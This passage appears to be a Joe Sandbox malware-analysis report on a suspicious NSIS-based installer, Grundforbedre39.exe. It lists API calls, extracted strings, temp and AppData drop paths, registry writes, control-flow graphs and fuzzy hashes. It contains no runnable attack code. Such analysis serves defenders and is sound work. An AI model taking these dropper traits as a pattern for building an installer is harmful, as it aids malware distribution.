                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(75B23420,00425738,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00405B1F,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406374
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 0040635D
                                                                                      • 8WB, xrefs: 0040635E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: 8WB$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                                                      • ShowWindow.USER32(?), ref: 00403C5F
                                                                                      • DestroyWindow.USER32 ref: 00403C73
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403D79
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DEE
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                                                      • EnableWindow.USER32(?,?), ref: 00403EE2
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EF8
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                                                      • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F17
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: &B
                                                                                      • API String ID: 3282139019-3208460036
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Grundforbedre39.exe,00000400,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402E1B
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Grundforbedre39.exe,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402E67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Grundforbedre39.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-108289670
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
                                                                                      • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-589119129
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb,?,?,00000031), ref: 004017CD
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp$C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb$Call
                                                                                      • API String ID: 1941528284-1615189334
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                      • lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll
                                                                                      • API String ID: 2531174081-1221101177
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 833 405648-405693 CreateDirectoryW 834 405695-405697 833->834 835 405699-4056a6 GetLastError 833->835 836 4056c0-4056c2 834->836 835->836 837 4056a8-4056bc SetFileSecurityW 835->837 837->834 838 4056be GetLastError 837->838 838->836
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • GetLastError.KERNEL32 ref: 0040569F
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                                                      • GetLastError.KERNEL32 ref: 004056BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                                                      • API String ID: 3449924974-2404651315
                                                                                      • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                                                      • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 839 4025e5-4025fa call 402ba2 842 402600-402607 839->842 843 402a4c-402a4f 839->843 844 402609 842->844 845 40260c-40260f 842->845 846 402a55-402a5b 843->846 844->845 847 402773-40277b 845->847 848 402615-402624 call 405f7a 845->848 847->843 848->847 852 40262a 848->852 853 402630-402634 852->853 854 4026c9-4026cc 853->854 855 40263a-402655 ReadFile 853->855 857 4026e4-4026f4 call 405c72 854->857 858 4026ce-4026d1 854->858 855->847 856 40265b-402660 855->856 856->847 859 402666-402674 856->859 857->847 866 4026f6 857->866 858->857 860 4026d3-4026de call 405cd0 858->860 862 40267a-40268c MultiByteToWideChar 859->862 863 40272f-40273b call 405f61 859->863 860->847 860->857 862->866 867 40268e-402691 862->867 863->846 870 4026f9-4026fc 866->870 871 402693-40269e 867->871 870->863 873 4026fe-402703 870->873 871->870 874 4026a0-4026c5 SetFilePointer MultiByteToWideChar 871->874 875 402740-402744 873->875 876 402705-40270a 873->876 874->871 877 4026c7 874->877 879 402761-40276d SetFilePointer 875->879 880 402746-40274a 875->880 876->875 878 40270c-40271f 876->878 877->866 878->847 881 402721-402727 878->881 879->847 882 402752-40275f 880->882 883 40274c-402750 880->883 881->853 884 40272d 881->884 882->847 883->879 883->882 884->847
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                        • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CE6
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                                      • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                                                      • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                                      • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 885 406384-4063a4 GetSystemDirectoryW 886 4063a6 885->886 887 4063a8-4063aa 885->887 886->887 888 4063bb-4063bd 887->888 889 4063ac-4063b5 887->889 891 4063be-4063f1 wsprintfW LoadLibraryExW 888->891 889->888 890 4063b7-4063b9 889->890 890->891
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                      • wsprintfW.USER32 ref: 004063D6
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,?), ref: 004063EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                                      • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                                                      • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                                      • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-40304f 892->894 893->894 895 403051 894->895 896 403056-40305b 894->896 895->896 897 40306b-403078 call 40320c 896->897 898 40305d-403066 call 403222 896->898 902 4031c3 897->902 903 40307e-403082 897->903 898->897 906 4031c5-4031c6 902->906 904 403088-4030a8 GetTickCount call 406513 903->904 905 4031ac-4031ae 903->905 918 403202 904->918 920 4030ae-4030b6 904->920 908 4031b0-4031b3 905->908 909 4031f7-4031fb 905->909 907 403205-403209 906->907 911 4031b5 908->911 912 4031b8-4031c1 call 40320c 908->912 913 4031c8-4031ce 909->913 914 4031fd 909->914 911->912 912->902 926 4031ff 912->926 916 4031d0 913->916 917 4031d3-4031e1 call 40320c 913->917 914->918 916->917 917->902 929 4031e3-4031ef call 405ca1 917->929 918->907 923 4030b8 920->923 924 4030bb-4030c9 call 40320c 920->924 923->924 924->902 930 4030cf-4030d8 924->930 926->918 935 4031f1-4031f4 929->935 936 4031a8-4031aa 929->936 932 4030de-4030fb call 406533 930->932 938 403101-403118 GetTickCount 932->938 939 4031a4-4031a6 932->939 935->909 936->906 940 403163-403165 938->940 941 40311a-403122 938->941 939->906 944 403167-40316b 940->944 945 403198-40319c 940->945 942 403124-403128 941->942 943 40312a-40315b MulDiv wsprintfW call 405179 941->943 942->940 942->943 951 403160 943->951 948 403180-403186 944->948 949 40316d-403172 call 405ca1 944->949 945->920 946 4031a2 945->946 946->918 950 40318c-403190 948->950 954 403177-403179 949->954 950->932 953 403196 950->953 951->940 953->918 954->936 955 40317b-40317e 954->955 955->950
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 551687249-2449383134
                                                                                      • Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                                      • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                                                      • Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                                      • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 956 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 963 4023c7-4023cf 956->963 964 402a4c-402a5b 956->964 965 4023d1-4023de call 402bbf lstrlenW 963->965 966 4023e2-4023e5 963->966 965->966 969 4023f5-4023f8 966->969 970 4023e7-4023f4 call 402ba2 966->970 974 402409-40241d RegSetValueExW 969->974 975 4023fa-402404 call 403027 969->975 970->969 977 402422-4024fc RegCloseKey 974->977 978 40241f 974->978 975->974 977->964 981 40281e-402825 977->981 978->977 981->964
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp
                                                                                      • API String ID: 1356686001-2234505353
                                                                                      • Opcode ID: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                                                      • Opcode Fuzzy Hash: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
